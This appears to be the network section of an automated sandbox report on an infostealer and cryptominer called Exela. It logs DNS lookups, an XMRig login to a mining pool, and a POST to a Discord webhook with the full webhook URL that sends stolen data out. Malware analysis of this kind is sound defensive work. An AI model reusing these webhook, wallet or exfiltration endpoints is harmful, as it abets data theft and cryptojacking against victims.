                                                                                                  Jan 12, 2025 07:11:32.549571037 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.550276041 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.550276041 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.550396919 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719477892 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719558001 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.719705105 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:34.720983028 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:34.721000910 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.723177910 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.723231077 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:34.723501921 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.723984003 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:34.724011898 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.195276022 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.195842981 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.195875883 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.196906090 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.196984053 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198105097 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198177099 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.198364019 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198453903 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:35.198465109 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:35.358275890 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.748317003 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:36.748431921 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:36.748683929 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.750222921 CET49992443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:36.750242949 CET44349992162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:47.779810905 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:47.826955080 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:01.105902910 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:01.155129910 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:09.462213993 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:09.514564037 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:12:31.513183117 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:12:31.561687946 CET49857443192.168.2.780.240.16.67

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 12, 2025 07:10:50.120904922 CET6223053192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:10:50.127825022 CET53622301.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:17.859173059 CET5935253192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:17.865780115 CET53593521.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.251852989 CET6234253192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET53623421.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.573817015 CET5847953192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:30.580466032 CET53584791.1.1.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.892726898 CET6256553192.168.2.71.1.1.1
                                                                                                  Jan 12, 2025 07:11:31.899880886 CET53625651.1.1.1192.168.2.7

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 12, 2025 07:10:50.120904922 CET192.168.2.71.1.1.10x6c8dStandard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:17.859173059 CET192.168.2.71.1.1.10xd0c9Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.251852989 CET192.168.2.71.1.1.10x181eStandard query (0)discordapp.comA (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:30.573817015 CET192.168.2.71.1.1.10x3f9fStandard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:31.892726898 CET192.168.2.71.1.1.10xc296Standard query (0)store1.gofile.ioA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 12, 2025 07:10:23.777848959 CET1.1.1.1192.168.2.70x78f4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:10:23.777848959 CET1.1.1.1192.168.2.70x78f4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:10:50.127825022 CET1.1.1.1192.168.2.70x6c8dNo error (0)pool.hashvault.pro192.248.189.11A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:10:50.127825022 CET1.1.1.1192.168.2.70x6c8dNo error (0)pool.hashvault.pro80.240.16.67A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:17.865780115 CET1.1.1.1192.168.2.70xd0c9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET1.1.1.1192.168.2.70x181eNo error (0)discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET1.1.1.1192.168.2.70x181eNo error (0)discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET1.1.1.1192.168.2.70x181eNo error (0)discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET1.1.1.1192.168.2.70x181eNo error (0)discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:27.258626938 CET1.1.1.1192.168.2.70x181eNo error (0)discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:30.580466032 CET1.1.1.1192.168.2.70x3f9fNo error (0)api.gofile.io51.91.7.6A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:30.580466032 CET1.1.1.1192.168.2.70x3f9fNo error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                  Jan 12, 2025 07:11:31.899880886 CET1.1.1.1192.168.2.70xc296No error (0)store1.gofile.io45.112.123.227A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • discordapp.com
                                                                                                  • api.gofile.io
                                                                                                  • store1.gofile.io
                                                                                                  • ip-api.com

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.749982208.95.112.1802980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 12, 2025 07:11:17.874192953 CET126OUTGET /json HTTP/1.1
                                                                                                  Host: ip-api.com
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Jan 12, 2025 07:11:18.338527918 CET482INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 12 Jan 2025 06:11:17 GMT
                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                  Content-Length: 306
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  X-Ttl: 7
                                                                                                  X-Rl: 42
                                                                                                  Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                  Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.74985780.240.16.674434300C:\Windows\System32\conhost.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:10:50 UTC594OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 37 52 50 77 42 56 4a 55 44 67 52 71 4e 35 75 69 58 53 55 76 64 50 71 36 7a 41 56 41 6a 48 43 32 6a 64 67 52 6e 75 53 75 4b 51 79 4d 66 72 4a 75 46 63 34 65 46 61 33 48 39 57 66 76 62 4a 63 75 42 43 63 74 65 37 75 42 41 31 76 61 63 4e 67 52 54 37 4d 45 31 76 78 34 58 74 4a 59 71 70 22 2c 22 70 61 73 73 22 3a 22 32 31 32 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22
                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"47RPwBVJUDgRqN5uiXSUvdPq6zAVAjHC2jdgRnuSuKQyMfrJuFc4eFa3H9WfvbJcuBCcte7uBA1vacNgRT7ME1vx4XtJYqp","pass":"212","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid":"
                                                                                                  2025-01-12 06:10:51 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 33 36 61 36 34 32 39 37 2d 30 38 38 61 2d 34 34 64 36 2d 38 64 62 35 2d 30 30 33 31 62 64 64 61 39 34 39 64 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 62 39 38 64 62 63 30 36 35 34 61 35 36 65 30 34 32 66 33 33 35 65 39 61 66 33 31 30 36 66 33 38 37 61 34 64 35 35 38 30 34 38 30 30 63 65 34 37 35 62 34 64 30 31 38 62 31 64 39 35 34 63 64 31 31 32 34 37 66 38 30 61 30 30 30 30 30 30 30 30 31 32 62 37 32 32 34 66 32 39 64 32 39 66 66 61 38 62 36 33 38 31 34 37 36 36 65 36 34 62 39 65 35 33 34 38 61 61 36 33 38 39 34 38 61 66 39 37 31 36 63 65 38 38 66 61 64 31 35 38 34 30 66
                                                                                                  Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"36a64297-088a-44d6-8db5-0031bdda949d","job":{"blob":"1010e7b98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a0000000012b7224f29d29ffa8b63814766e64b9e5348aa638948af9716ce88fad15840f
                                                                                                  2025-01-12 06:11:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 62 39 38 64 62 63 30 36 35 34 61 35 36 65 30 34 32 66 33 33 35 65 39 61 66 33 31 30 36 66 33 38 37 61 34 64 35 35 38 30 34 38 30 30 63 65 34 37 35 62 34 64 30 31 38 62 31 64 39 35 34 63 64 31 31 32 34 37 66 38 30 61 30 30 30 30 30 30 30 30 39 61 32 30 61 38 34 30 39 36 33 62 37 64 65 64 33 63 36 65 62 66 66 64 33 31 63 37 35 35 33 32 63 39 36 66 32 66 35 62 63 64 32 38 36 64 38 30 30 66 33 37 32 32 38 65 64 35 30 35 39 34 30 34 31 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 63 35 65 33 30 37 36 2d 31 63 35 38 2d 34 32 39 35 2d 39 61 34 63 2d 62 61 63 36 61 30 39 61 39 36 33 66 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e7b98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a000000009a20a840963b7ded3c6ebffd31c75532c96f2f5bcd286d800f37228ed505940411","job_id":"3c5e3076-1c58-4295-9a4c-bac6a09a963f","ta
                                                                                                  2025-01-12 06:11:09 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 64 62 39 38 64 62 63 30 36 35 34 61 35 36 65 30 34 32 66 33 33 35 65 39 61 66 33 31 30 36 66 33 38 37 61 34 64 35 35 38 30 34 38 30 30 63 65 34 37 35 62 34 64 30 31 38 62 31 64 39 35 34 63 64 31 31 32 34 37 66 38 30 61 30 30 30 30 30 30 30 30 31 64 63 33 34 65 39 36 34 34 63 34 32 65 38 66 31 32 65 34 65 32 37 30 35 35 33 62 33 65 38 37 31 31 37 63 38 62 62 66 30 33 34 32 34 38 36 36 38 62 63 64 33 39 39 33 65 34 35 63 65 38 39 39 31 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 30 37 34 62 39 36 37 2d 39 31 30 36 2d 34 64 33 33 2d 39 39 64 31 2d 34 64 66 37 33 65 31 62 61 64 39 61 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fdb98dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a000000001dc34e9644c42e8f12e4e270553b3e87117c8bbf034248668bcd3993e45ce89911","job_id":"3074b967-9106-4d33-99d1-4df73e1bad9a","ta
                                                                                                  2025-01-12 06:11:31 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 33 62 61 38 64 62 63 30 36 35 34 61 35 36 65 30 34 32 66 33 33 35 65 39 61 66 33 31 30 36 66 33 38 37 61 34 64 35 35 38 30 34 38 30 30 63 65 34 37 35 62 34 64 30 31 38 62 31 64 39 35 34 63 64 31 31 32 34 37 66 38 30 61 30 30 30 30 30 30 30 30 32 30 32 34 35 31 66 64 38 34 33 38 61 32 30 62 62 66 66 66 30 62 37 39 61 65 64 64 65 32 33 37 35 62 64 63 32 32 65 32 30 37 63 33 34 61 62 32 31 63 32 31 33 36 64 39 34 66 38 64 35 66 62 31 31 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 39 32 38 34 65 64 66 2d 35 38 36 33 2d 34 62 36 34 2d 62 64 62 30 2d 35 61 35 66 38 38 31 63 37 64 39 62 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101093ba8dbc0654a56e042f335e9af3106f387a4d55804800ce475b4d018b1d954cd11247f80a00000000202451fd8438a20bbfff0b79aedde2375bdc22e207c34ab21c2136d94f8d5fb114","job_id":"c9284edf-5863-4b64-bdb0-5a5f881c7d9b","ta
                                                                                                  2025-01-12 06:11:47 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 33 62 61 38 64 62 63 30 36 66 61 31 30 34 35 32 34 32 38 38 33 66 37 30 36 66 35 39 34 65 36 32 36 33 63 61 30 64 39 35 66 30 38 31 61 63 32 39 37 62 64 39 64 38 61 34 61 35 30 38 33 65 64 62 61 64 61 61 63 65 64 61 30 30 30 30 30 30 30 30 30 36 63 64 36 33 63 61 38 65 62 33 30 36 65 63 36 37 38 62 64 38 62 61 39 64 39 61 62 35 34 34 64 36 34 36 30 63 66 64 33 30 38 35 32 38 34 34 35 64 34 62 34 31 38 62 62 38 39 61 30 35 39 33 37 30 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 33 62 64 36 63 33 37 2d 61 34 61 66 2d 34 61 37 63 2d 61 64 39 64 2d 33 32 35 62 36 33 61 63 37 35 66 34 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000006cd63ca8eb306ec678bd8ba9d9ab544d6460cfd308528445d4b418bb89a0593701","job_id":"13bd6c37-a4af-4a7c-ad9d-325b63ac75f4","ta
                                                                                                  2025-01-12 06:12:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 33 62 61 38 64 62 63 30 36 66 61 31 30 34 35 32 34 32 38 38 33 66 37 30 36 66 35 39 34 65 36 32 36 33 63 61 30 64 39 35 66 30 38 31 61 63 32 39 37 62 64 39 64 38 61 34 61 35 30 38 33 65 64 62 61 64 61 61 63 65 64 61 30 30 30 30 30 30 30 30 30 34 62 36 35 39 33 33 30 38 36 38 31 30 37 35 35 35 66 65 37 31 37 34 61 63 61 33 65 37 34 65 65 63 34 30 33 39 32 63 64 39 62 35 38 63 61 37 62 63 32 38 36 34 64 31 62 33 36 30 61 34 38 32 39 30 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 38 65 64 38 37 66 32 2d 61 38 38 37 2d 34 65 37 32 2d 62 63 61 31 2d 37 30 65 32 66 66 30 34 36 61 33 31 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a3ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000004b659330868107555fe7174aca3e74eec40392cd9b58ca7bc2864d1b360a482901","job_id":"58ed87f2-a887-4e72-bca1-70e2ff046a31","ta
                                                                                                  2025-01-12 06:12:09 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 39 62 61 38 64 62 63 30 36 66 61 31 30 34 35 32 34 32 38 38 33 66 37 30 36 66 35 39 34 65 36 32 36 33 63 61 30 64 39 35 66 30 38 31 61 63 32 39 37 62 64 39 64 38 61 34 61 35 30 38 33 65 64 62 61 64 61 61 63 65 64 61 30 30 30 30 30 30 30 30 30 37 39 34 36 32 39 36 36 63 61 36 30 37 38 61 38 32 39 32 66 34 34 31 66 65 66 64 37 31 37 31 32 65 63 39 65 63 39 39 33 30 35 32 32 39 39 34 64 31 38 36 65 35 32 66 35 37 65 36 61 31 33 66 64 30 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 34 38 32 34 65 37 39 38 2d 35 63 34 38 2d 34 62 64 66 2d 38 37 31 32 2d 63 65 61 63 61 37 39 63 66 38 66 66 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b9ba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda00000000079462966ca6078a8292f441fefd71712ec9ec9930522994d186e52f57e6a13fd08","job_id":"4824e798-5c48-4bdf-8712-ceaca79cf8ff","ta
                                                                                                  2025-01-12 06:12:31 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 66 62 61 38 64 62 63 30 36 66 61 31 30 34 35 32 34 32 38 38 33 66 37 30 36 66 35 39 34 65 36 32 36 33 63 61 30 64 39 35 66 30 38 31 61 63 32 39 37 62 64 39 64 38 61 34 61 35 30 38 33 65 64 62 61 64 61 61 63 65 64 61 30 30 30 30 30 30 30 30 30 36 65 64 65 35 62 38 38 39 66 35 36 30 39 32 34 35 38 65 64 38 34 31 31 32 63 39 32 36 32 66 37 37 62 65 32 33 31 30 35 34 32 65 61 32 33 65 38 39 39 38 34 32 61 36 39 34 35 62 38 36 31 37 62 30 63 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 31 63 37 34 31 64 65 2d 66 30 32 63 2d 34 64 35 65 2d 38 31 62 39 2d 37 39 38 38 35 39 34 64 30 63 65 38 22 2c 22 74 61
                                                                                                  Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cfba8dbc06fa1045242883f706f594e6263ca0d95f081ac297bd9d8a4a5083edbadaaceda0000000006ede5b889f56092458ed84112c9262f77be2310542ea23e899842a6945b8617b0c","job_id":"21c741de-f02c-4d5e-81b9-7988594d0ce8","ta


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.749983162.159.134.2334432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:27 UTC282OUTPOST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
                                                                                                  Host: discordapp.com
                                                                                                  Content-Type: application/json
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 1379
                                                                                                  2025-01-12 06:11:27 UTC1379OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 20 46 75 6c 6c 20 49 6e 66 6f 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30
                                                                                                  Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Exela Stealer Full Info***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0
                                                                                                  2025-01-12 06:11:27 UTC1115INHTTP/1.1 204 No Content
                                                                                                  Date: Sun, 12 Jan 2025 06:11:27 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Connection: close
                                                                                                  Set-Cookie: __dcfduid=0f26544ed0ac11ef80d5ba8b98d27b3f; Expires=Fri, 11-Jan-2030 06:11:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662289
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QEgndhUGprmHRlVRKMYQAFrJg%2FN6TftKm0AfqCuiliKm2NAbcuVDvdNlITGqkTA0Whx29uXMlW01uuaqT0l0yJ0ueVNEVonrUeh207qh%2BstSlvIVJO%2BSzcO8W%2FI8%2B6CJ"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Set-Cookie: __sdcfduid=0f26544ed0ac11ef80d5ba8b98d27b3fc5579229b5329e1871465a91b048bb8ca973bfaee3a736a7707de73121f03735; Expires=Fri, 11-Jan-2030 06:11:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  2025-01-12 06:11:27 UTC626INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 6b 52 65 33 68 36 6b 4b 75 6f 32 44 50 67 54 4c 62 64 5f 4e 41 4e 6b 2e 4d 42 70 39 78 65 71 7a 4d 63 30 49 68 58 6d 4a 62 53 6b 2d 31 37 33 36 36 36 32 32 38 37 2d 31 2e 30 2e 31 2e 31 2d 51 43 71 45 66 74 57 61 4d 69 57 50 55 57 46 71 39 6a 79 54 55 53 73 58 62 57 62 56 57 75 71 66 5a 36 5a 4d 57 63 37 30 79 67 49 6c 50 58 78 67 51 36 6a 70 35 5f 2e 4f 45 59 66 75 6b 2e 50 33 6b 30 39 70 68 72 52 42 35 76 49 4b 32 47 4b 6e 37 6f 4d 35 5f 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 31 32 2d 4a 61 6e 2d 32 35 20 30 36 3a 34 31 3a 32 37 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72
                                                                                                  Data Ascii: Set-Cookie: __cf_bm=kRe3h6kKuo2DPgTLbd_NANk.MBp9xeqzMc0IhXmJbSk-1736662287-1.0.1.1-QCqEftWaMiWPUWFq9jyTUSsXbWbVWuqfZ6ZMWc70ygIlPXxgQ6jp5_.OEYfuk.P3k09phrRB5vIK2GKn7oM5_g; path=/; expires=Sun, 12-Jan-25 06:41:27 GMT; domain=.discordapp.com; HttpOnly; Secur


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
